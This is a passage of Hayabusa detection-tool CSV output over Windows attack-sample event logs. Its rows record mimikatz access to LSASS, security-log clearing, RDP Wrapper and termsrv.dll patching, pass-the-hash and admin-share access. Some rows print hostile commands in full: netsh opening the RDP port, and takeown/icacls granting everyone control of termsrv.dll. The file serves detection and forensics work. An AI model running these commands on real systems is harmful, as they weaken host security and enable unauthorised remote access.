Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:44.637 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,../hayabusa-rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,../hayabusa-rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx 2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx 2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer: | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 